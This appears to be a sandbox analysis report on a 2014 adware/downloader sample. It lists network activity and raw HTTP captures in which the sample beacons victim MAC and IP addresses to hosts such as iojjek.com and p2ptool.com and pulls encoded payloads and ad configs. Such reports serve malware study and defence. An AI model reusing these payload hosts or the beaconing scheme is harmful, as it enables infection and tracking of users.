.FYF | 94208 | 151552 | 151552 | 4.48946 | b063438bbfbe3ad481ac57d58a6e5403 |
.fyf | 245760 | 24576 | 24576 | 1.2573 | 99258b4abbf40d5dd4b49639f1d3e8ea |
.fyf | 270336 | 139264 | 139264 | 5.508 | 2b1cc40328f8cdd81d81a5fcc4a97692 |
.FYFa | 409600 | 393216 | 393216 | 5.1687 | 518f5b687ef25cd9efa4eb3b02d16991 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://www.iojjek.com/down/20140504201222.dat?mac=0050563cacd6&lip=192.168.150.144&user=58lm/temptation.bin&ver=10.10.17 | 118.145.16.38 |
hxxp://www.iojjek.com/down/20140403140535.dat?mac=0050563cacd6&lip=192.168.150.144&user=58lm/temptation.bin&ver=10.10.17 | 118.145.16.38 |
hxxp://www.iojjek.com/down/20140404174727.dat?mac=0050563cacd6&lip=192.168.150.144&user=58lm/temptation.bin&ver=10.10.17 | 118.145.16.38 |
hxxp://www.iojjek.com/down/20131127183156.dat?mac=0050563cacd6&lip=192.168.150.144&user=58lm/temptation.bin&ver=10.10.17 | 118.145.16.38 |
hxxp://a1.p2ptool.com/txt/qtool.txt?ver=3.180&uid=qing01.4&lip=192.168.150.144&mac=0050563CACD6&p=0&b=0.0.0.0.0&md5=00533A1092B84F73B9CCC1AD91064DF3 | 42.159.80.192 |
hxxp://download.cpudln.com/12/ad22161.exe?mac=0050563cacd6&lip=192.168.150.144&user=58lm/temptation.bin&ver=10.10.17 | 174.37.172.71 |
hxxp://a1.p2ptool.com/txt/shock.txt?ver=3.180&uid=qing01.4&lip=192.168.150.144&mac=0050563CACD6&p=0&b=0.0.0.0.0&md5=83CAF3E7E328C4F1B414B0565546DA23 | 42.159.80.192 |
hxxp://www.iojjek.com/down/20140403140503.dat?mac=0050563cacd6&lip=192.168.150.144&user=58lm/temptation.bin&ver=10.10.17 | 118.145.16.38 |
hxxp://a1.p2ptool.com/txt/MiniIE.txt?ver=3.180&uid=qing01.4&lip=192.168.150.144&mac=0050563CACD6&p=0&b=0.0.0.0.0&md5=0CF4F544011329985BA796AD74A77901 | 42.159.80.192 |
hxxp://a1.p2ptool.com/txt/minie.txt?ver=3.180&uid=qing01.4&lip=192.168.150.144&mac=0050563CACD6&p=0&b=0.0.0.0.0&md5=BABC6CF351B7B2C4C859C12DFBD39277 | 42.159.80.192 |
hxxp://a1.p2ptool.com/txt/First.txt?ver=3.180&uid=qing01.4&lip=192.168.150.144&mac=0050563CACD6&p=0&b=0.0.0.0.0&md5=5D8AFFE78CF6342F0127A967DE092E0A | 42.159.80.192 |
hxxp://a1.p2ptool.com/txt/whitelist.txt?ver=3.180&uid=qing01.4&lip=192.168.150.144&mac=0050563CACD6&p=0&b=0.0.0.0.0&md5=25AEE42B466DB1826F98A5F21A9A9C94 | 42.159.80.192 |
hxxp://1st.ecoma.glb0.lxdns.com/client/config.ini | |
hxxp://1st.ecoma.glb0.lxdns.com/attachments/advert/201405/20140505190815.ico | |
hxxp://download006.rdb.cnc.ccgslb.com.cn/getconfig/minisite.ini | |
hxxp://1st.ecoma.glb0.lxdns.com/attachments/advert/201405/20140505190854.ico | |
hxxp://1st.ecoma.glb0.lxdns.com/sh/index.html | |
hxxp://tt.woai310.com/client/config.ini | 209.170.78.73 |
hxxp://site.minimenhu.com/sh/index.html | 209.170.78.73 |
hxxp://get.woai310.com/getconfig/minisite.ini | 221.194.130.5 |
hxxp://icon.woai310.com/attachments/advert/201405/20140505190854.ico | 209.170.78.77 |
hxxp://icon.woai310.com/client/config.ini | 209.170.78.77 |
hxxp://icon.woai310.com/attachments/advert/201405/20140505190815.ico | 209.170.78.77 |
ad.zzinfor.cn |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /client/config.ini HTTP/1.0
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: icon.woai310.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 05 May 2014 13:29:59 GMT
Server: Apache
Last-Modified: Mon, 05 May 2014 11:09:53 GMT
ETag: "3f82de-167-4f8a52baea240"
Accept-Ranges: bytes
Content-Length: 359
Content-Type: text/plain
X-Via: 1.1 fra72:5 (Cdn Cache Server V2.0)
Connection: close
[AD192]..id=192..url=hXXp://p.ucwan87.net/s/1/1222/19865.html?uid=905030..reg=..name=................ico=hXXp://icon.woai310.com/attachments/advert/201405/20140505190815.ico..[AD193]..id=193..url=hXXp://youxi.baidu.com/yxpm/pm.jsp?pid=101110070500236_2838257..reg=..name=..........ico=hXXp://icon.woai310.com/attachments/advert/201405/20140505190854.ico..
GET /sh/index.html HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: site.minimenhu.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Mon, 05 May 2014 13:30:06 GMT
Server: nginx/1.4.4
Content-Type: text/html
Last-Modified: Mon, 05 May 2014 09:34:12 GMT
Transfer-Encoding: chunked
Content-Encoding: gzip
X-Via: 1.1 fra73:6 (Cdn Cache Server V2.0)
Connection: keep-alive
826.............YKo#..>s~E{.K...!.A....k.Q.^.^.6.X.M.9l.g.;....:.w8@.\b$..<`..8....Z.... 9..!9..K...{..84..6.C.8.]..W..U...s....}.:.c...n.:...M...M.|..E...._..l.B.!.#.i.cf...u..y..4...1,.A.....#.d.........o....m.1?r....JE).Q.[..G8..._$.c:p.f.s... ?yqtNF...U...0".y...ts.......o.^.s.`s......3.....P..3R..O.|R3....c.8z.D.......lZ........?~|r.....~....>...{d<..Vt1.0h.|N.3&p..{H.G2..(.C..=.cF..!\......E....f.Q2.....1.'...^3'.j..Ak.`^........b.u...a."...u.....d8.?....-6{..u...p..Q.....1..."......^.G$...,&..7rY..n.y... .o.O...Q...5.........!.c..........s.....)...O?IC.Z..5Ex.....!l.@.."....?KC.Y..3E....R..]..;Ex..'..q(.@(....G.LC..@.L.~...[i.........<|.v*.J..~)].....!.c.c.3.....'...\...............y.{o.....{.f.N...!..7?...?}...O.!........}..'.}zz.lP...4u$7.xk.#=.........#[O.H.......C.. <....x.....C..{..1..}.jQ.-....l.?..0..{.E.G.!DzI..a.!m...kY.C...Ni.BQ.tt].6 .C$.6..a...e..1B...N....o:m"L.[...Z...Y.)/.Ia......Y...R.[.4.[k....m].E..a.....o.bl...w.O}.j..1...'.{.d/."..S/... ..^.Z.k...Q.KzK.".^i.[...9z.. ....];...u/.Cp.....,=3\q.=o..N-.....i...s..u..2.....l~.S.......%O...0.....V.@y.C......].C<.M.......\......I......&e...6~...........D..l...4.n......xq.6S...9.h[.Df......q?.81..@....~.L;.B...q....L..fLL(...T....1....A'..#...(P.....dIg.!\..(..}m..P.p..q.....D... .....%*7..f..kD_9A].N.<.........*.|U.~......Z....!.D..9...1..7\.....7...\V.gg..c..7....^8.l..S...%(.......s...P;.......P..v..X..91...:.!m...........@...P.g....QY.O.$.L.X..#.....1a...!.q..6.w..i....\.....6! L.6.J.F3.b%.V.2....a.5.8*..c_...k.....
<<
<<< skipped >>>
GET /client/config.ini HTTP/1.0
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: tt.woai310.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 05 May 2014 13:19:47 GMT
Server: Apache
Last-Modified: Mon, 05 May 2014 10:47:43 GMT
ETag: "3d8761-19e-4f8a4dc6871c0"
Accept-Ranges: bytes
Content-Length: 414
Content-Type: text/plain
Age: 1
X-Via: 1.1 fra72:5 (Cdn Cache Server V2.0)
Connection: close
[u]..[AD452]..id=452..url=hXXp://t.xydhl.com/?eid=638aiOt+ay+fG8cY0iRI3L+Pk3hy82KNMBAbzJRGCYPG..reg=..[AD454]..id=454..url=hXXp://nbtg3.youyou234.com/?uid=913189..reg=..[AD455]..id=455..url=hXXp://VVV.mygame66.com/213700004.html..reg=..[AD458]..id=458..url=hXXp://num9998.7lianmeng.net/ ..reg=..[u]..name=705679..[AD282]..id=282..url=hXXp://tg.dhelper001.com/goto/jump.php?source=158&aid=40..reg=..
GET /down/20140403140535.dat?mac=0050563cacd6&lip=192.168.150.144&user=58lm/temptation.bin&ver=10.10.17 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: VVV.iojjek.com
Connection: Keep-Alive
nConnection: Close
HTTP/1.1 200 OK
Server: nginx/1.4.2
Date: Mon, 05 May 2014 13:26:41 GMT
Content-Type: application/octet-stream
Content-Length: 128924
Last-Modified: Thu, 03 Apr 2014 06:05:35 GMT
Connection: keep-alive
ETag: "533cfa2f-1f79c"
Accept-Ranges: bytes
D....m.7/6.h.>.=...~5...._........0;....".&.....}|.....e.../....t. ..".Z...p>5.1.R.."...~1....P.v.).<..w..=....{...6...X........)......d....v:.x_|..m......!. .4.4...=RP0.7..Z...r....t....U... *........P...*.b...m$q$%F..\..l..u.....vx..:.nu$..O...G..v.8.4......v..q.la....Vr...7s.15X.....t.O-/.............x....U..c/[..7..9.R6.m9......F..n....V.r.:.1..I..,....Z........?T..|......4r.f.~...L..)7)..!3F..T]...Da......7..M.H.t....~E/(.Ac...M_.W.....~...7........j..X...j9.FM/...5..tB...H.{..o$ ..o.}....Z.....`.:7...Y.f.c@:3 ..9.-...O.w..yf..J..z.U...F.6...8....dq.nA..q.... ...9........E/..,{..?f...4.%.c..........P.....z.......7....\.T.s.ZO.K.Fz.7=.-..........Dzw.tf...~.Y.K.b......Yn..H......./.......:%.Y.u..R.(el$.*....v6.g...'.!....._.V..$....|....:....v...7.6..$}......lyY......q..@./.m...r...(..`.........AD.....]z.t_..n...h'..J....Em%y...g..J.4...o..........Y[VuF.XQ=o...)..M...p..%e....zg.i..B..;..X.......\=..9...K<......d.h.'.....}..&.............^.n.1...n;b)$".............^......6.....#.Jw%Aj.f..D...j......G!6...1.....L.....[........S......YH1..fjf%O=t....*.g..ez...C..2g.....@......../..Q...e....Z._t...h*....T....OrI.......Q9..l..\F_........ .@.(F./."..|E?.l...6F@..n"....^$w..V/.Wem5..u0..P.~).vv.(u;3#E.e.w1...EL...H.M.3....g0U..x..:.n.f...n.DT?1.g..e...`_8A.`.....r.$.z.z..........<...Q.#b......O..g... .oVg..}'.O..?... .X@[....]..X...I.!..#J.O.j.z.,....YM....)...shSo?.&..L.@.....8.Od....g..'..!<.@...<..;".;.n.`....k.5f..g...R.......,]`....6.!......|uz.i^Cyd.....\....`Q}I.s.Po..._.\_...}..J.....
<<
<<< skipped >>>
GET /attachments/advert/201405/20140505190854.ico HTTP/1.0
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: icon.woai310.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 05 May 2014 13:30:03 GMT
Server: Apache
Last-Modified: Mon, 05 May 2014 11:08:54 GMT
ETag: "28d800a-25be-4f8a5282a5d80"
Accept-Ranges: bytes
Content-Length: 9662
Content-Type: image/x-icon
X-Via: 1.1 fra72:3 (Cdn Cache Server V2.0)
Connection: close
......00.... ..%......(...0...`..... ......$.........................................................................................Haf..24... ......#'..HO.."%..]a..]c..qu.J...............................................................................................................................................,X]..................................................25..ej.Zno.............................................................................................................................<.!..................................................................45..<>.,...............................................................................................................&................................................................................! ..bc......................................................................................................?B..........................................................................................oy.F................................................................................................................................................................................................(..X.......................................................................................H........................................................................................................cb.N................................................................................:>........................................................................
<<
<<< skipped >>>
GET /txt/First.txt?ver=3.180&uid=qing01.4&lip=192.168.150.144&mac=0050563CACD6&p=0&b=0.0.0.0.0&md5=5D8AFFE78CF6342F0127A967DE092E0A HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: a1.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Mon, 05 May 2014 13:30:18 GMT
Content-Type: text/plain
Content-Length: 55992
Last-Modified: Thu, 31 Oct 2013 07:46:57 GMT
Connection: close
ETag: "52720af1-dab8"
Accept-Ranges: bytes
nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WtCdFRaA9XVxQksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQwYd9QvPwQZJhMLtkxzc e3eegsVDHMnI3ntEYf13SVkvsJZ4XdxDrVLxACy9qsmmgVCdZFzvgX20M2VmJYg rxTDHkczewCRJ1hJUEbkP2gsSZCTd 4FOg443QXXuBQY6T5iMX3zOegBi79uobm5qxNrNDZlI WvE2s0NmUj5ay0C63Xri3dB717iQq7OTl19OaA4pTXvaHKcH4udAKrcqsrTAUDl3sdam7dtSK3XPhLaLi3q7GUvlycn0DaQTrXm/H8aJaRsqeb8fxolpGypqZSXdMJEowytj4tOAGKUF sMaJudVXlW6wxom51VeVZRJhvIVRruRMTazQ2ZSPlrfecpNLUfrsqL/vBMfyAlccTazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrTPMmJn/9ziEisc6R0/dQ3YsYpk leK3vxNrNDZlI WtXEcfORTifCxn ZMaxjFZ7q5904VxUrUsXZb10kL1hesTazQ2ZSPlrEkYhq4qBTrw/Rp3LuKWWWAgWC/SF/A5XV0Ykwt0Ip XE2s0NmUj5a3C2I9Jaq5QixNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrGwk/Dns/Y08qL4WDoLD oVCTa/ZEFhlLkQ4VQeWa3c81NbtSY9QqcGjbM i6KTv3tRbjrRTjzKzGrfbi VensS9JGCL6q7dl1hmlDPyCnuXerh8XMC0Ao YBqQMrPzPY4f sO4iAG26fZ717XXkK05s6ah 21mxj3tJilPoe7e8pLtN7U5XdNivRQ mLJE1O7GZumjZvlaLfu5eg4CLnn 01WkZ1U8IF
<<
<<< skipped >>>
GET /down/20140403140503.dat?mac=0050563cacd6&lip=192.168.150.144&user=58lm/temptation.bin&ver=10.10.17 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: VVV.iojjek.com
Connection: Keep-Alive
nConnection: Close
HTTP/1.1 200 OK
Server: nginx/1.4.2
Date: Mon, 05 May 2014 13:26:41 GMT
Content-Type: application/octet-stream
Content-Length: 146489
Last-Modified: Thu, 03 Apr 2014 06:05:04 GMT
Connection: keep-alive
ETag: "533cfa10-23c39"
Accept-Ranges: bytes
qMj\.O.7.T.0g..eJ'.&.z}..j$...$.....'.>.z..MF...M|.P`......i....^....L._..|[.C..q.*`.X.....@...OD<...%.....n...(>.....2..Eu.W.N...v....I.2.K.Z..<..q.T.pU........b]..4q!.o.h.t.z..;...VZ/...=...a...'.w.`...].6.... -Bx.L.Y.6A......W.7.........^..=..3.....$.~'..0..........}0..A;..-..t...C6.}...i.....y........f<..7..2.S...l..c.kX..5q.......s....7S1...8..*/.....B...'.>..O..9.5J....o!....=Z...$.:.../.}..V..&..O.cX.0....K.5-;au.........3.C.m<..u..~.V...n.. yk0......".....XK.l(-.h@.b7V~.c<.(....~.-.....IaEB..%......C.s..TPf."._BnLy.t.O......2\n..z.b3!w..5...../...J.....k..s...Hx."[iQ....o.jK.)w .....PVUK8}[ji...Z.N19...A.... E..K."....\z:..\(a.Mv....j9._ .-.ot2..'..N..../...z...[......"...(.\4:...;....,).Q..3......Y.K..F/..Ag...........w.........\7/....3er..Dh....^O.[..$0.....3....s...V....#..`....k2....L.E...#.7\....Z...>F.<..."..@KL.&.;....#K0...Qk...^....s.z..qJ..SA|U.Q.....5.)....._Y....!5|tGw].........%.. ...&...i......x.u..:.....1.,...&.m........i...y.E...1.h...........=.....$...tC.....<NPe.....a<.3....*~..&,.e.............:.S$J.&M3.!......%L...6...9...&.r....@!....o................x.T=B.QJW.Ma.]H....D......7sk....i.......G[...-yB........3It/.c..W..2. .A......O.`w..Z...'......!7n...Y..!F..?14c......)n.:....h).^v..0Rn..[.....KY....U 8.^0..p9...OU;.1LQ.0....O....;;.[..0......._...j...kd.0.S.~.b.[.'B.`.k/.. z..uV...a.[X.N.O...F~.H..t..~.T...;R._zg3...f7..-.......O.T..56C...........bp...x....b...h...X..}z8^....c.J..x0....j...............f...'...rp.Y....0..>B.....Bw.r...).x......U
<<
<<< skipped >>>
GET /down/20140504201222.dat?mac=0050563cacd6&lip=192.168.150.144&user=58lm/temptation.bin&ver=10.10.17 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: VVV.iojjek.com
Connection: Keep-Alive
nConnection: Close
HTTP/1.1 200 OK
Server: nginx/1.4.2
Date: Mon, 05 May 2014 13:26:41 GMT
Content-Type: application/octet-stream
Content-Length: 762046
Last-Modified: Sun, 04 May 2014 12:12:23 GMT
Connection: keep-alive
ETag: "53662ea7-ba0be"
Accept-Ranges: bytes
..`W4`Ruq_.;.J.n!..-k.w.............,E..q.x....../C....F K.q$_..W.sD..E.....`.Lb\q'[|.x. .....s.%..coC....f!.A.bPv.M..X..|t.0....g..p)}.,.....B>[..I. .6';)-..ii.q'#"uW.L...&.Z.!..~Bf-...o.s...4../y.fK...'w.d.....z...!..KY..A5e9..t[B.0.,...A....l}@c......\.....X...#.L..n./...KT.h.b9..D'.....!.......[.....;o=2.........9...o\q@1RN........O]&@X-'..$..|..... .2?Rw.....H@.82/k..%P.`?..1K~.M.kH...x..I.x.. .....c....U$..32.)f~.........]'.7........^..........M..$.....o[....\.H...s~......VW3g.n...pxj..=q.Bs...._.o.........c......t...e{........U...y...55....&D...D.\..9D..K...hBl .j...M...v3..$.$#k2.2.6j|.X.:...&o.=Qc.-...(&W.....M _......1....4...TP..?..w.T.i.,m..2..P..D{.N.T....5.]......%..mq.......z.....w......P....m..r.C.fg.....C....<..U/.Q...!).M...p.....i....H........C..Y!..P7.I...,...a.9\...lC.D......vG.)..|.{H'"..2Y..h...O../<oX.M]..k"...v8.g..p6/.....6.,i.w.9..k..QA.(..)iRs...s.O.].".3(.O............m......../...hYN..R.$1..).Vv~.i.q....{.P'5.Z.....a7.. ..d..H.<../.~iC.. .h.3Z.....0..]......?.'.H.`...Z.^.....s...j..7..ie......y.b...........?H.#c....e....s.....[?P.H.-.z.Z...cO.E6.)X.=`E.... .........X.3H.7"...o. w..x..kj..5.....D#.!v.i#..*....S_......=.$..1.D..........l......5..f.k....1..U .UX.....wF..D.\..>j....p$oS.D..h....3R...{...C..f...nYw.i..[..!....vF".)..0^f*.PHG..E..K...K?Z1~..u~.F..d-.<|...wl........o.#`^...V.{.D.9...<z......U.....V..f.....]F..=x.5........s.j......O5...4=.mgT..uq.*.....C....~..>....U."(....*Z../.v...$..W...w....jl.......c{0...0y.2:..^t...|u..1b?.#%P..U..k.=..J<.@
<<
<<< skipped >>>
GET /txt/minie.txt?ver=3.180&uid=qing01.4&lip=192.168.150.144&mac=0050563CACD6&p=0&b=0.0.0.0.0&md5=BABC6CF351B7B2C4C859C12DFBD39277 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: a1.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Mon, 05 May 2014 13:30:17 GMT
Content-Type: text/plain
Content-Length: 552288
Last-Modified: Thu, 17 Apr 2014 07:17:37 GMT
Connection: close
ETag: "534f8011-86d60"
Accept-Ranges: bytes
nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI Wvq/lGe PyKoQksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQwYd9QvPwQZJhMLtkxzc e3eegsVDHMnKjEM/P7VSUkIYTUcGBy2FRC69p6kVkATlPn WKha p6mLJe9YFjcg9nuyZte/2TbGFcNnJ91uh0PfRH1ExkBHVqd1/r2cPqCiD5giKQdfMHD66jLvKSMlRvQmJSadR2n3Vk/YAGJcwV XizD15bgLX7qdeHg7EomncBFjKkwnCIsTazQ2ZSPlrxNrNDZlI WstAut164t3QfHudIJIr smfTmgOKU172hbZTlKVOmWE3pn6q7sUWNyE5exr0XB8pgwv8NfP4RCFZcnJ9A2kE615vx/GiWkbKnm/H8aJaRsqd271Qtjsj1BrY LTgBilBfrDGibnVV5VusMaJudVXlWUSYbyFUa7kTE2s0NmUj5a0m0lxXHFYJ4Xc5x1SSJqkDE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a0zzJiZ//c4hfivhh9p0ZFGLGKZPpXit78TazQ2ZSPlrVxHHzkU4nwsZ/mTGsYxWe0LkLId ZuYAX7fEDC5dHRfE2s0NmUj5axJGIauKgU68P0ady7illlgKt4zBzmW5N8zf2QXrcyOGxNrNDZlI WtwtiPSWquUIsTazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrGwk/Dns/Y0 FHM2uc40vb0DYWs9eRZyinW89vxTB12DE/jA70gQ0qTwji9/vboXA0GVkOD1EPp8tRR/tRJlxLr0ORgCIWWdcT3siEntPeUrTAtU5sq1E N1wm0UTmfGU 1RGVQa9wXIsMN9Et8T3gJ7dLjTRWH28N35hb5zqcCrXkdyIKyarHsAxIq1gYYnBhrakrmIqNItl8Rxg5V XKISZZR39k7Se
<<
<<< skipped >>>
GET /txt/qtool.txt?ver=3.180&uid=qing01.4&lip=192.168.150.144&mac=0050563CACD6&p=0&b=0.0.0.0.0&md5=00533A1092B84F73B9CCC1AD91064DF3 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: a1.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Mon, 05 May 2014 13:30:16 GMT
Content-Type: text/plain
Content-Length: 207544
Last-Modified: Fri, 14 Mar 2014 03:05:39 GMT
Connection: close
ETag: "53227203-32ab8"
Accept-Ranges: bytes
nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI Wu7vg7o4OGLvAksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQwYd9QvPwQZJhMLtkxzc e3eegsVDHMnLqo60gvePDkoHM9DbJe7Tjh4 nH2bP9aFCSwjYHR4l 7UwqvSEOhNXHppTDLj119TWXeJh3IJ9esBiFPqijxoprj91UOh3kmU26coaV4mme /YnyMwF8msX7gSTAatirUd/BfXQBNlpsTazQ2ZSPlrxNrNDZlI WvE2s0NmUj5ay0C63Xri3dB1yL7Y0rVPJSM IdytADpRZZQpdrfS4c3NsJHySq6XNHZfI3JbHxSfuN3zViD8BTVlycn0DaQTrWJvgEYtUqAbYm ARi1SoBtv503yyV8YI5tDvmh0eAJpOsMaJudVXlW6wxom51VeVZRJhvIVRruRMTazQ2ZSPlrfG3yIDZT/NrQRADa8IaeW8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrmXxDh0CbFt/E2s0NmUj5a8TazQ2ZSPlrRgCXvWcoIV/E2s0NmUj5a8TazQ2ZSPlrTPMmJn/9ziGfgG2kySe5BYsYpk leK3vxNrNDZlI WtXEcfORTifCxn ZMaxjFZ7Zl0rhN6noR2szABXdb4xacTazQ2ZSPlrEkYhq4qBTrw/Rp3LuKWWWFmpUjgoGpwtrpDmPV/qCfrE2s0NmUj5a3C2I9Jaq5QixNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrGwk/Dns/Y0 IwuSEW9tTzkexR8iciydRaOzkEh5NbtgkIKp2UrgNyxOobQe2 p/t2Eck12VQqJInk6kovpOlrKsWW3dvX2r4NjjBj1CRSFuMRJcgAFXGKYy1 eIv0GjvJRuME adz1uJdAhTPxjooDQWaox01yuknv10PbZLRO1BQWTcFX/iEwhWJM5PjkByvM0g97rP1diCYBrSyRSnea4uowziO3 1
<<
<<< skipped >>>
GET /txt/MiniIE.txt?ver=3.180&uid=qing01.4&lip=192.168.150.144&mac=0050563CACD6&p=0&b=0.0.0.0.0&md5=0CF4F544011329985BA796AD74A77901 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: a1.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Mon, 05 May 2014 13:30:16 GMT
Content-Type: text/plain
Content-Length: 362944
Last-Modified: Wed, 23 Oct 2013 18:15:53 GMT
Connection: close
ETag: "52681259-589c0"
Accept-Ranges: bytes
